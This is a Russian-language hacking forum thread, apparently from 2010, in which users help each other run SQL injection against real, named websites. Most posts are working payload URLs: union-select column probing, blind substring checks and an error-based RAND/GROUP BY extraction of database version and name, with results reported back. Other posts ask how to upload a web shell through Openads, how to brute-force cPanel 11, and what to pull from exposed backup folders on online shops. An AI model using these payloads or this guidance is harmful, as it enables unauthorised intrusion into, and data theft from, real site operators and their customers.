Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    Редко, если только пользователь, от которого запускается web-сервер, является владельцем или входит в группу владельцев папки, к которой необходимо поменять доступ.
     
  2. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Здесь есть SQL-inj?

    http://www.bigr.nl/website/structure/main.php?page=people&subpage=person&id=51'+order+by+1000+--+
     
  3. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    _http://www.aquaticplantcentral.com/forumapc/plantfinder/details.php?id=-36'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--+


    _http://www.bigr.nl/website/index.php?page=people&subpage=person&id=JifkeVeenland')+and+substring(version(),1,1)=5+and+('1'='1

    или через ошибку

    _http://www.bigr.nl/website/index.php?page=people&subpage=person&id=JifkeVeenland')+and+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID(VERSION(),1,63),+FLOOR(RAND(0)*2)))+and+('1'='1

    не смог больше ничего придумать..
     
    #13343 .:[melkiy]:., 3 Jun 2010
    Last edited: 3 Jun 2010
    2 people like this.
  4. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Класс!
     
    #13344 FlaktW, 3 Jun 2010
    Last edited: 3 Jun 2010
  5. haito

    haito Banned

    Joined:
    27 May 2010
    Messages:
    23
    Likes Received:
    1
    Reputations:
    1
    привет команде;

    http://www.msufoundation.com/impact/stories/details.php?id=-36 union all select 1,concat_ws(0x3a,unhex(hex(version())),unhex(hex(database()))),3,2,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--

    мы получили->4.1.14:extaffairs

    http://www.msufoundation.com/impact/stories/details.php?id=36 and substring(version(),1,1)=4 -> true

    Я не знаю, почему он тут ошибки, это должно быть правдой
    http://www.msufoundation.com/impact/stories/details.php?id=36 and substring(database(),1,1)="e" <-error
    :confused:
     
    #13345 haito, 3 Jun 2010
    Last edited: 3 Jun 2010
  6. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    MagicQuotes on
     
  7. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    67
    Likes Received:
    90
    Reputations:
    52
    http://www.msufoundation.com/impact/stories/details.php?id=36+and+lower(ascii(substring(database(),1,1)))=101
     
    #13347 v1d0qz, 3 Jun 2010
    Last edited: 3 Jun 2010
    1 person likes this.
  8. total90

    total90 Elder - Старейшина

    Joined:
    30 Sep 2009
    Messages:
    90
    Likes Received:
    85
    Reputations:
    12

    Или же
    http://www.msufoundation.com/impact/stories/details.php?id=36+and+substring(database(),1,1)=0x65
     
  9. DrakonSerg

    DrakonSerg Member

    Joined:
    16 Apr 2009
    Messages:
    66
    Likes Received:
    17
    Reputations:
    -1
    что можно вытащить полезного (к чему докопаться) если просматриваются папки
    /backup/
    /includes/
    /js/
    /scripts/
    /temp/
    /email/
    очень много таких сайтов насобиралось, в основном онлайн шопы.
    И еще одно, есть ли возможность взлома либо брута cPanel 11?
     
  10. haito

    haito Banned

    Joined:
    27 May 2010
    Messages:
    23
    Likes Received:
    1
    Reputations:
    1
    Привет группы;

    Можно ли придать этим сайтом?, потому что у нас нет какой-либо аргумент URL

    http://www.kitterytradingpost.com/product.php
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 :confused:
     
  11. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    http://www.kitterytradingpost.com/product.php/prodid/3647
    делаешь так
    http://www.kitterytradingpost.com/product.php?prodid=-3647 и вот тут дальше копай
     
    1 person likes this.
  12. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    ребят есть способ заливки шелла через Openads (phpAdsNew) ? :)
     
    _________________________
  13. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    тынц
    для кого тему прикрепляли? в след раз будет минус.
     
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    OK , спасибо ))
     
    _________________________
  15. haito

    haito Banned

    Joined:
    27 May 2010
    Messages:
    23
    Likes Received:
    1
    Reputations:
    1
    http://www.kitterytradingpost.com/product.php?prodid=3647 order by 29 <-error

    Итак, мы имеем 28


    http://www.kitterytradingpost.com/product.php?prodid=3647 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- <- The used SELECT statements have a different number of columns

    что случилось? :confused:
     
  16. haito

    haito Banned

    Joined:
    27 May 2010
    Messages:
    23
    Likes Received:
    1
    Reputations:
    1
  17. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Читай.
     
  18. [ DSU ]

    [ DSU ] Elder - Старейшина

    Joined:
    22 Oct 2007
    Messages:
    103
    Likes Received:
    96
    Reputations:
    88
    Там еще вырезаются ( ) так что некоторые методы вывода сразу лесом =(
     
    3 people like this.
  19. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    там вырезаются запятые, проблема именно в этом
    http://www.kitterytradingpost.com/product.php?prodid=36,,,,47
     
  20. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    Подскажите команды для работы с sql-inj - mysql 4 ветки.
    Команды просмотра таблиц базы данных ну и собсвенно самих таблиц.

    А пока вы тут мне подсказываете я на другие форумы полез

    P.S с 5 веткой проще работать
     
Thread Status:
Not open for further replies.